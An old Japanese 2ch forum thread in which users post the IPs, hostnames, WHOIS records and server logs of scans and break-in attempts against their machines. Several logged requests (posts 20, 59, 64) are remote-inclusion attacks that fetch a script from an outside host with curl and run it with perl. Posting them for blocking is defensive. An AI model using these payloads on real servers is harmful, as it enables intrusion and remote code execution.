不正アクセスしてくるIPを晒すスレ Part8

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
勝手に不正アクセスしてくるIPを晒していくスレ 
FWのIPフィルター設定し、アクセス拒否する参考にドゾー 

注:Whois 全部貼らなくていいから 
IPと国ぐらいで簡単に報告! 

IPアドレスの検索は、 

IPドメインSEARCH  
http://www.mse.co.jp/ip_domain/ 

IPアドレス検索/サイバーエリアリサーチ株式会社 
http://www.arearesearch.co.jp/ip-kensaku.html 

サイトチェック 
http://sitecheck.jp/checkip.phtml 

McAfee NeoTrace Express 3.25 
http://www.networkingfiles.com/PingFinger/Neotraceexpress.htm 

前スレ 
不正アクセスしてくるIPを晒すスレ Part7 
http://pc8.2ch.net/test/read.cgi/sec/1117558232/
21:2005/11/06(日) 16:37:27
URLの最後に余計な入ってしまった
スマソ
3名無しさん@お腹いっぱい。:2005/11/06(日) 16:45:38
↑余計なスペースだよ…
逝ってくるorz
4時折来る厨対策にこれも:2005/11/06(日) 18:26:51
216 名前:名無しさん@お腹いっぱい。 投稿日:05/01/22 18:37:37
   >>216
   スレ勉しる。
   おまいの晒したIP無意味だぽ。
   反論したければ、特定結果かもしくは通報の返答をうpしる。



   っても、池沼にゃ無理な相談か。。。


>>216 m9(^Д^)

5名無しさん@お腹いっぱい。:2005/11/06(日) 18:33:33
210.150.160.253
renoir.excite.co.jp
6名無しさん@お腹いっぱい。:2005/11/06(日) 19:15:53
       /⌒ヽ
⊂二二二( ^ω^)二⊃
     |    /       ブーン
      ( ヽノ
      ノ>ノ 
  三  レレ
7名無しさん@お腹いっぱい。:2005/11/06(日) 21:38:17
( ・∀・)<今日の朝、前スレにいたうんこマンだけど
       誰かMEにTEACHしてくれYO!
http://pc8.2ch.net/test/read.cgi/sec/1117558232/982-985
( ・∀・)<エロいみんな教えてくれYO!
9名無しさん@お腹いっぱい。:2005/11/06(日) 23:51:33
IP  202.180.199.208
ホスト pc40208.ict.ne.jp
伊賀上野・・・忍の技には長けていないようですな
10名無しさん@お腹いっぱい。:2005/11/07(月) 02:27:35
11名無しさん@お腹いっぱい。:2005/11/07(月) 02:59:28
12名無しさん@お腹いっぱい。:2005/11/07(月) 06:58:18
>>7
無意味とは限らん。
偽装する方法があるからといって、現実にすべて偽装されてはいない。
わざわざ偽装などしてないことの方が多いのではないか。
13名無しさん@お腹いっぱい。:2005/11/07(月) 10:38:14
次スレ乙。そして3日間不正アクセスなくて珍しいと思ったらこれか。(省略部分は同じか似たようなアクセス)
2005/11/05(03:54:16) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) [80] 404 0 "POST /xmlrpc.php HTTP/1.1" ( dummy )
2005/11/05(03:54:21) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:54:26) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:54:31) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:54:37) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:54:42) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:54:47) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:54:52) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:54:58) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:55:03) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:55:08) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:55:14) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:55:19) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:55:24) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:55:29) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) [80] 404 0 "POST /phpgroupware/xmlrpc.php HTTP/1.1" ( dummy )
2005/11/05(10:23:24) W-SV 211.95.176.67 [80] 400 0 "GET http//www.ebay.com/ HTTP/1.1" ( dummy )
2005/11/06(20:53:39) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp(211.2.39.63) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/11/06(20:55:03) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp
2005/11/06(22:11:08) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp
2005/11/06(23:00:13) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp
2005/11/06(23:52:22) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp(211.2.39.63) [80] 302 29 "GET / HTTP/1.0" ( dummy )
14名無しさん@お腹いっぱい。:2005/11/07(月) 10:38:58
それと脆弱性だろうというのは把握している。
15名無しさん@お腹いっぱい。:2005/11/07(月) 15:26:03
コイツうぜ〜

IPアドレス 59.190.125.222
ホスト名 59-190-125-222.eonet.ne.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 兵庫県
市外局番 --
接続回線 光
16名無しさん@お腹いっぱい。:2005/11/07(月) 18:30:01
なんか今日多い。腹立つ。

IPアドレス 58.1.137.236
ホスト名 nttkyo331236.tkyo.nt.ftth.ppp.infoweb.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 東京都
市外局番 --
接続回線 光


IPアドレス 58.1.108.15
ホスト名 ntsitm184015.sitm.nt.ftth.ppp.infoweb.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 埼玉県
市外局番 --
接続回線 光
17名無しさん@お腹いっぱい。:2005/11/07(月) 22:03:58
>>1
乙ですが、ポートも書くように付け加えとくべきでしたね。
あいかわらず何されたか書けない人多い。
18名無しさん@お腹いっぱい。:2005/11/07(月) 23:37:24
IP 220.159.53.253
ホスト t553253.ipgw.phs.yoyogi.mopera.ne.jp
ドコモ経由ってのは初体験だな。
19名無しさん@お腹いっぱい。:2005/11/08(火) 05:40:02
20名無しさん@お腹いっぱい。:2005/11/08(火) 11:20:24
2005/11/07(23:56:59) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404 0 "GET /pma/main.php HTTP/1.1" ( dummy )
2005/11/07(23:56:59) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404
2005/11/07(23:57:00) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404
2005/11/07(23:57:01) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404
2005/11/07(23:57:01) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404
2005/11/07(23:57:02) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404 0 "GET /phpmyadmin/main.php HTTP/1.1" ( dummy )
2005/11/08(02:12:59) W-SV 218.234.130.16 [80] 404 0 "GET /bbs/skin/zero_vote/error.php?dir=http//upteams.netfirms.com/fbi.gif?&cmd=cd%20/tmp;%20curl%20-O%20viperxl.wc.hu/piz;perl%20piz HTTP/1.1" ( dummy )
2005/11/08(02:13:05) W-SV 218.234.130.16 [80] 404
2005/11/08(02:13:11) W-SV 218.234.130.16 [80] 404
2005/11/08(02:13:17) W-SV 218.234.130.16 [80] 404
2005/11/08(02:13:23) W-SV 218.234.130.16 [80] 404
2005/11/08(02:13:29) W-SV 218.234.130.16 [80] 404 0 "GET /skin/zero_vote/error.php?dir=http//upteams.netfirms.com/fbi.gif?&cmd=cd%20/tmp;%20curl%20-O%20viperxl.wc.hu/piz;perl%20piz HTTP/1.1" ( dummy )
21名無しさん@お腹いっぱい。:2005/11/09(水) 06:33:55
こいつしつこい…

IPアドレス 58.93.87.11
ホスト名 i58-93-87-11.s02.a012.ap.plala.or.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 千葉県
市外局番 --
接続回線 xDSL
22名無しさん@お腹いっぱい。:2005/11/09(水) 09:41:20
IP Address = 210.235.243.41
Host Name = ea41.opt2.point.ne.jp

a. [IPネットワークアドレス] 210.235.240.0/21
b. [ネットワーク名] TEPCO-HIKARI
f. [組織名] 株式会社ドリーム・トレイン・インターネット
g. [Organization] DREAM TRAIN INTERNET,Inc.
m. [管理者連絡窓口] MH4804JP
n. [技術連絡担当者] MK10931JP
p. [ネームサーバ] ns.dti.ad.jp
p. [ネームサーバ] ns2.dti.ad.jp
[割当年月日] 2004/11/29


23名無しさん@お腹いっぱい。:2005/11/09(水) 10:10:21
2005/11/09(01:34:49) W-SV jupiter.tntonline.com(204.145.237.11) [80] 404 0 "GET /phpmyadmin/index.php HTTP/1.1" ( )
24名無しさん@お腹いっぱい。:2005/11/09(水) 16:25:04
yahoobb218125122014.bbtec.net

218.125.122.14
25名無しさん@お腹いっぱい。:2005/11/09(水) 23:39:28
IPアドレス 212.87.192.14
ホスト名 fw1-bcnjz0-nix.core.es.inter.net
IPアドレス
 割当国 ※ スペイン (ES)

スペインとかこわい・・・・
26名無しさん@お腹いっぱい。:2005/11/10(木) 00:34:58
5W1H
27名無しさん@お腹いっぱい。:2005/11/10(木) 07:03:26
IPアドレス 200.67.92.81
ホスト名 dsl-200-67-92-81.prod-empresarial.com.mx
IPアドレス
割当国 ※ メキシコ (MX)

((((;゚Д゚)))ガクガクブルブル
28名無しさん@お腹いっぱい。:2005/11/10(木) 13:06:52
222.234.94.22
29名無しさん@お腹いっぱい。:2005/11/10(木) 13:42:40
P2PやってるカスどもがIP晒してどうすんだwww
そりゃ海外からアタックはくるわな。

それ以外はport21,22,25,80,135,137,138,139,443,445
を防ぐかTCP/UDPのSYNフラグを全部はじけばいいだけwwwwwwwww

おまえらアホすぎ
30名無しさん@お腹いっぱい。:2005/11/10(木) 20:42:32
[14:58:26] <222.187.114.2> (178,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /http/219.133.51.39/getimage
31名無しさん@お腹いっぱい。:2005/11/11(金) 08:34:32
20.253.253.68

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.253.240.0/20
b. [ネットワーク名] ASAHI-NET
f. [組織名] 朝日ネット
g. [Organization] Asahi Net
m. [管理者連絡窓口] AT009JP
n. [技術連絡担当者] AT009JP
p. [ネームサーバ] crusader.asahi-net.or.jp
p. [ネームサーバ] dns1.asahi-net.or.jp
[割当年月日] 2000/04/05
[最終更新] 2004/04/14 10:00:11(JST)

上位情報
----------
株式会社朝日ネット (ASAHI Net,Inc.)
[割り振り] 210.253.240.0/20

下位情報
----------
該当するデータがありません。

朝日から不正アクセス
32名無しさん@お腹いっぱい。:2005/11/11(金) 08:49:36

192.168.1.11    ← 最近うざすぎ!!
 
ノートンが反応しっぱなし!
33名無しさん@お腹いっぱい。:2005/11/11(金) 09:10:29
      _/i    i'l,_
     ./ЩY.    YЩ)
    ノニ;;ノ    ヽ;;;ニi,     人人人人人人人人人
    /  i      i  'i   < こいつ最高にアホ!
    〉  ''(_ .;;''';;:,  )''  〈    Y^Y^Y^Y^Y^Y^Y^Y^
    i,   "ヽi"台"i/"  i 
    > :;;;i "''''i'''"  i;;::: <
     i., ::;l :;;:;;:i:;;;:;;;: l;: ,ノ
     ヽ "'-::;;:;;::-'" /
      ヽ;;::___:;:___,,.:/ 
     /-、''':::::'''..-''ヽ  
    /_,,  ヽ;::;ノ '" ヽ 
   / x, ヽノヽ/ .x "'、
   (.,, ,. _/  \:; .,,ノ,  
   i 彡,,..ノ,     i".,,_ミミi 
    l┐i-7     ヽ"-iΠ
   // )      / \\ 
  (_/"       "'\___)
34名無しさん@お腹いっぱい。:2005/11/11(金) 16:14:02
>>32
うちにもちょっと違うけど同じようなIPから何回も来るよ
まじうざい
35名無しさん@お腹いっぱい。:2005/11/11(金) 16:28:01
>>32
それってアンタのルータのIPじゃないのか?
36名無しさん@お腹いっぱい。:2005/11/12(土) 00:05:39
IP「 210.154.213.246 」
ホスト「 p2246-ipbf201kanazawa.ishikawa.ocn.ne.jp 」
前から突っ込んで来たが、昨日から連続して・・・
此処まで気付かないと言う事は、御老人ユーザーか?
37名無しさん@お腹いっぱい。:2005/11/12(土) 00:10:32
偽装IPもしらんのかこのスレのうんこども
38名無しさん@お腹いっぱい。:2005/11/12(土) 02:21:25
>>37
じゃあ偽装してフシアナしてみろよ。
39名無しさん@お腹いっぱい。:2005/11/12(土) 11:39:22
wbcc2s06.ezweb.ne.jp
KDDI-TS32 UP.Browser/6.2.0.9.1

機種ってWIN32なのでしょうか
40名無しさん@お腹いっぱい。:2005/11/12(土) 16:43:22
馬鹿だなぁと思っていたが、偽装じゃなくてもありえる事が発覚したので、
無線LAN周りの設定を再確認した今日この頃。
41名無しさん@お腹いっぱい。:2005/11/12(土) 22:46:03
inetnum: 203.174.64.0 - 203.174.79.255
netname: DATAHOTEL
descr: Livedoor co., Ltd.
descr: DataHotel TaskForce
country: JP
admin-c: KS62-AP
admin-c: KK110-AP
tech-c: KK110-AP
tech-c: KS62-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-JP-LIVEDOOR
changed: [email protected] 20010531
changed: [email protected] 20040107
status: ALLOCATED PORTABLE
changed: [email protected] 20040302
source: APNIC
42名無しさん@お腹いっぱい。:2005/11/12(土) 22:46:51
person: Kei Kato
nic-hdl: KK110-AP
e-mail: [email protected]
address: 2-16-9, Kabuki-cho, Shinjuku-ku, Tokyo Japan 160-0021
phone: +81-3-5749-9621
fax-no: +81-3-5749-9910
country: JP
changed: [email protected] 20040513
mnt-by: MAINT-JP-LIVEDOOR
source: APNIC
43名無しさん@お腹いっぱい。:2005/11/12(土) 22:47:35
person: Kensaku Shimada
nic-hdl: KS62-AP
e-mail: [email protected]
address: 2-16-9, Kabuki-cho, Shinjuku-ku, Tokyo Japan 160-0021
phone: +81-3-5749-9621
fax-no: +81-3-5749-9910
country: JP
changed: [email protected] 20040513
mnt-by: MAINT-JP-LIVEDOOR
source: APNIC
44名無しさん@お腹いっぱい。:2005/11/13(日) 03:33:43
ルータのアクセスブロック履歴にある
From送信元 と To宛先

どっちが攻撃側かわかりません
やっぱFromの方?
45名無しさん@お腹いっぱい。:2005/11/13(日) 10:58:56
自分のグローバルIPアドレス確認すればいい話
46名無しさん@お腹いっぱい。:2005/11/13(日) 23:06:44
61.177.64.110

inetnum: 61.177.0.0 - 61.177.255.255
netname: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CJ186-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-JS
mnt-routes: maint-chinanet-js
changed: [email protected] 20020209
changed: [email protected] 20030306
status: ALLOCATED non-PORTABLE
source: APNIC
47名無しさん@お腹いっぱい。:2005/11/13(日) 23:42:00
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 221.171.0.0/16
b. [ネットワーク名] BIGLOBE-8
f. [組織名] BIGLOBEサービス(日本電気株式会社)
g. [Organization] NEC Corporation
m. [管理者連絡窓口] NK032JP
n. [技術連絡担当者] MK11728JP
p. [ネームサーバ] ns02.mesh.ad.jp
p. [ネームサーバ] ns03.mesh.ad.jp
[割当年月日] 2004/02/04
[最終更新] 2004/04/12 17:47:01(JST)

上位情報
----------
日本電気株式会社 (NEC Corporation)
[割り振り] 221.171.0.0/16

下位情報
----------
該当するデータがありません。
48たか:2005/11/14(月) 04:23:47
個体識別番号って同じ番号の人ゎいるのでしょうか?
49名無しさん@お腹いっぱい。:2005/11/14(月) 10:07:02
224.0.0.22
50名無しさん@お腹いっぱい。:2005/11/14(月) 16:59:29
222.110.243.187 Korea

62.121.132.250 Poland
rtr.biotech.krakow.pl

83.18.75.138 Poland
awx138.internetdsl.tpnet.pl
51名無しさん@お腹いっぱい。:2005/11/14(月) 17:00:12
ll218a.sport.jyu.fi
52名無しさん@お腹いっぱい。:2005/11/14(月) 18:36:50
[15:37:13] <84.177.218.155> (0,0) [ヘッダー受信中に切断しました] - -
[15:37:19] <84.177.218.155> (0,0) [ヘッダー受信中に切断しました] - -
[15:37:20] <84.177.218.155> (0,0) [ヘッダー受信中に切断しました] - -
[15:37:40] <84.177.218.155> (0,0) [ヘッダー受信中に切断しました] - -

オランダから・・・
53名無しさん@お腹いっぱい。:2005/11/15(火) 20:45:26
202.159.249.219 India

port 445 を叩きに来るのってワームだっけ?
54名無しさん@お腹いっぱい。:2005/11/15(火) 21:29:36
>>53
そそ
55名無しさん@お腹いっぱい。:2005/11/16(水) 00:40:55
俺なら手動でも445なら叩くけど
56名無しさん@お腹いっぱい。:2005/11/16(水) 07:18:17
IPアドレス 220.108.54.114
ホスト名 i220-108-54-114.s02.a012.ap.plala.or.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 千葉県
市外局番 --
接続回線 xDSL
57名無しさん@お腹いっぱい。:2005/11/16(水) 08:07:15
>>55
445なんか開いてる奴いる?
58名無しさん@お腹いっぱい。:2005/11/16(水) 10:03:19
>>57
PC買って初期の状態のままなら445はあいてるだろ
OSでデフォでふさがれるようになったのはXP・SP2からだし
59名無しさん@お腹いっぱい。:2005/11/16(水) 10:44:18
2005/11/16(10:40:37) W-SV 220.89.250.64 [80] 404 0 "GET /bbs/skin/zero_vote/error.php?dir=http//222.122.47.216/bbs/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http//222.122.47.216/bbs/sess;perl%20sess HTTP/1.1" ( dummy )
2005/11/16(10:40:43) W-SV 220.89.250.64 [80] 404 0 "GET /board/skin/zero_vote/error.php?dir=http//222.122.47.216/bbs/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http//222.122.47.216/bbs/sess;perl%20sess HTTP/1.1" ( dummy )
2005/11/16(10:40:49) W-SV 220.89.250.64 [80] 404 0 "GET /zboard/skin/zero_vote/error.php?dir=http//222.122.47.216/bbs/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http//222.122.47.216/bbs/sess;perl%20sess HTTP/1.1" ( dummy )
2005/11/16(10:40:55) W-SV 220.89.250.64 [80] 404 0 "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http//222.122.47.216/bbs/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http//222.122.47.216/bbs/sess;perl%20sess HTTP/1.1" ( dummy )

11/14は不正アクセスなしだったのに残念。
その他はいつもの/ GETだけだった。
60名無しさん@お腹いっぱい。:2005/11/16(水) 14:28:45
28.40.138.210.wd.2iij.net [210.138.40.28]
何回アクセスしてんだよ
61名無しさん@お腹いっぱい。:2005/11/16(水) 20:57:58
[15:20:17] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:19] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:20] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:21] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:26] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:28] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:29] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:30] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:31] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:32] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:33] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:35] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -

ちぅごくしつこい
62名無しさん@お腹いっぱい。:2005/11/16(水) 23:35:13
IPアドレス 221.117.212.123
ホスト名 221x117x212x123.ap221.ftth.ucom.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 北海道
63名無しさん@お腹いっぱい。:2005/11/17(木) 06:27:40
220.221.94.129
ホスト名 i220-221-94-129.s02.a012.ap.plala.or.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 千葉県
市外局番 --
接続回線 xDSL
64名無しさん@お腹いっぱい。:2005/11/17(木) 11:07:30
2005/11/17(06:14:55) W-SV 210.178.51.1 [80] 404 0 "GET /bbs/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy )
2005/11/17(06:15:00) W-SV 210.178.51.1 [80] 404 0 "GET /zboard/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy )
2005/11/17(06:15:06) W-SV 210.178.51.1 [80] 404 0 "GET /board/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy )
2005/11/17(06:15:12) W-SV 210.178.51.1 [80] 404 0 "GET /zeroboard/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy )
2005/11/17(06:15:18) W-SV 210.178.51.1 [80] 404 0 "GET /zb41/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy )
65名無しさん@お腹いっぱい。:2005/11/18(金) 13:57:27
58.157.163.29

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 58.157.163.0/24
b. [ネットワーク名] SUBA-468-2BD
f. [組織名] 株式会社ユーズコミュニケーションズ
g. [Organization] UCOM Corporation
m. [管理者連絡窓口] AT047JP
n. [技術連絡担当者] AT047JP
p. [ネームサーバ] ns01.usen.ad.jp
p. [ネームサーバ] ns02.usen.ad.jp
p. [ネームサーバ] ns03.usen.ad.jp
[割当年月日] 2005/06/09
[最終更新] 2005/06/09 18:12:13(JST)

上位情報
----------
株式会社ユーズコミュニケーションズ (U's Communications Corp.)
[割り振り] 58.156.0.0/15

下位情報
----------
該当するデータがありません。
66名無しさん@お腹いっぱい。:2005/11/18(金) 14:17:39
やぁ、このスレを見た君にとっておきのスペシャルなニュースだ
君はコンピューターウイルスをくらったことあるかい?
ウイルスはとっても危険だ、誰だって避けたい
でも2ちゃんにはそんなウイルスがしこんであるアドレスがたくさん貼ってある
その度にタイーホなんて言われるがリアル逮捕なんてほとんど無い
でもこれは立派な犯罪だ(http://www.ss.iij4u.or.jp/~somali/web/security/obstruct.html)

これから紹介するスレは>>1ことID:H+tEOmVN0が確信的にウイルスを貼って
それをふんだ人を見てあざけ笑っているという、とってもファンキーなスレだ
どうだい君もID:H+tEOmVN0同じように軽い気持ちでリアル通報してみないかい?
みんながまじめに通報なんてしたら
普段やる気の無いポリスも「いっちょやってみっか」って気分になるってもんさ
おっと、そこの優しい君はID:H+tEOmVN0がかわいそうなんて思ったかい?
そんな心配、無問題
ID:H+tEOmVN0は逮捕の殿堂に入れるとウキウキワクワク
そんなに期待されたら通報するしかないじゃない
ここらでこれからの2ちゃんのために
「2ちゃんにウイルスを貼って通報されて逮捕」っていう分かりやすい前例作ろうぜ!

>>1のアドレスにはウイルスしこんであります

http://news19.2ch.net/test/read.cgi/news/1132282995/
67名無しさん@お腹いっぱい。:2005/11/18(金) 23:51:43
アクセス拒否リスト
ttp://transport.ddo.jp/access.csv

かなり成長しました
68名無しさん@お腹いっぱい。:2005/11/19(土) 07:53:22
IPアドレス 58.80.55.28
ホスト名 58x80x55x28.ap58.ftth.ucom.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 光

Domain Information: [ドメイン情報]
a. [ドメイン名] UCOM.NE.JP
b. [ねっとわーくさーびすめい] ゆーこむねっと
c. [ネットワークサービス名] ユーコムネット
d. [Network Service Name] UCOM-NET
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] AT047JP
n. [技術連絡担当者] AT047JP
p. [ネームサーバ] ns01.usen.ad.jp
p. [ネームサーバ] ns02.usen.ad.jp
[状態] Connected (2006/06/30)
[登録年月日] 2005/06/24
[接続年月日] 2005/06/24
[最終更新] 2005/06/24 16:32:04 (JST)
69名無しさん@お腹いっぱい。:2005/11/19(土) 10:29:51
[06:10:03] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:04] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:06] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:07] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:08] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:09] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:10] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:11] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:12] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:13] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:14] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:16] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:17] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -


またkrか!!
70名無しさん@お腹いっぱい。:2005/11/19(土) 13:23:09
61-26-238-188.rev.home.ne.jpからポート1433に断続的に不正アクセスが続いてまつ。氏ね。
71名無しさん@お腹いっぱい。:2005/11/19(土) 14:32:57
220.209.89.160

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 220.209.75.0-220.209.182.255
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [管理者連絡窓口] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns3.hyper.web.ad.jp
[割当年月日] 2003/05/08
[最終更新] 2003/12/18 17:02:51(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 220.209.0.0/16

下位情報
----------
該当するデータがありません。

俺のサーバも取引不能です。FMVです。
72名無しさん@お腹いっぱい。:2005/11/19(土) 23:58:19
219.53.112.49
73名無しさん@お腹いっぱい。:2005/11/20(日) 02:14:06
210.255.100.228
毎日1時間近くポート80突付いてくる
74名無しさん@お腹いっぱい。:2005/11/20(日) 04:59:40
220.150.141.130
75名無しさん@お腹いっぱい。:2005/11/20(日) 12:07:33
下記のIpアドレス最悪! UPX_Packed_Executableという攻撃をしてきやがった。

IPアドレス 207.217.127.78
ホスト名 update00.psp.pas.earthlink.net
 割当国 ※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
【攻撃内容】
UPX_Packed_Executable
このシグネチャは、UPX ツールを使って圧縮された PE/COFF 実行ファイルを
検出します。 UPX で圧縮された実行ファイルの存在は、これ自体が攻撃を示
すものではありませんが、例外が考えられます。 UPX ツールはトロイやマル
ウェアを圧縮するのに広く使用されます。正当な商用ソフトウェアを配布する
のに使用されるツールとしては、あまり一般的ではありません。 このファイル
を調査し、マルウェアの構成要素となっているかどうかを確認する必要があり
ます。
76名無しさん@お腹いっぱい。:2005/11/20(日) 13:28:59
先週パスワードアタックをしてきたホスト
133.27.178.4
140.124.181.220
148.243.214.13dapsaisd.com.mx
161.53.201.3osijek.etfos.hr
202.30.198.233
203.198.68.237ipvpn027237.netvigator.com
204.11.16.194lnx118.onestop.net
210.219.251.113
210.52.66.62
211.106.179.139
211.43.101.132
216.20.254.14
221.117.40.5221x117x40x5.ap221.ftth.ucom.ne.jp
221.143.22.22
221.247.59.66221x247x59x66.ap221.ftth.ucom.ne.jp
58.4.140.15458x4x140x154.ap58.ftth.ucom.ne.jp
59.120.145.759-120-145-7.HINET-IP.hinet.net
67.100.66.101h-67-100-66-101.chcgilgm.covad.net
69.64.37.68 air532.startdedicated.com
70.86.67.130130.70-86-67.reverse.theplanet.com
80.108.7.100chello080108007100.36.11.vie.surfer.at
81.208.32.17081-208-32-170.ip.fastwebnet.it
84.244.0.215serv-1-0-215.lycos-vds.com
84.244.1.254serv-1-1-254.lycos-vds.com
77名無しさん@お腹いっぱい。:2005/11/20(日) 13:32:28
失礼、タブだと無くなっちゃうんですね。
この1週間の間にsshのパスワードアタックをしてきたホストです

133.27.178.4  
140.124.181.220  
148.243.214.13  dapsaisd.com.mx
161.53.201.3  osijek.etfos.hr
202.30.198.233  
203.198.68.237  ipvpn027237.netvigator.com
204.11.16.194  lnx118.onestop.net
210.219.251.113  
210.52.66.62  
211.106.179.139  
211.43.101.132  
216.20.254.14  
221.117.40.5  221x117x40x5.ap221.ftth.ucom.ne.jp
221.143.22.22  
221.247.59.66  221x247x59x66.ap221.ftth.ucom.ne.jp
58.4.140.154  58x4x140x154.ap58.ftth.ucom.ne.jp
59.120.145.7  59-120-145-7.HINET-IP.hinet.net
67.100.66.101  h-67-100-66-101.chcgilgm.covad.net
69.64.37.68  air532.startdedicated.com
70.86.67.130  130.70-86-67.reverse.theplanet.com
80.108.7.100  chello080108007100.36.11.vie.surfer.at
81.208.32.170  81-208-32-170.ip.fastwebnet.it
84.244.0.215  serv-1-0-215.lycos-vds.com
84.244.1.254  serv-1-1-254.lycos-vds.com

78名無しさん@お腹いっぱい。:2005/11/20(日) 14:33:59
大人気に嫉妬。
79名無しさん@お腹いっぱい。:2005/11/20(日) 15:34:14
127.0.0.1←このIPやたら「IP Spoofing」って攻撃してくるんだけど本物のクラッカー?
OrgName:Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US
NetRange: 127.0.0.0 - 127.255.255.255
CIDR:127.0.0.0/8
NetName: LOOPBACK
NetHandle:NET-127-0-0-0-1
Parent:
NetType: IANA Special Use
Comment: Please see RFC 3330 for additional information.
RegDate:
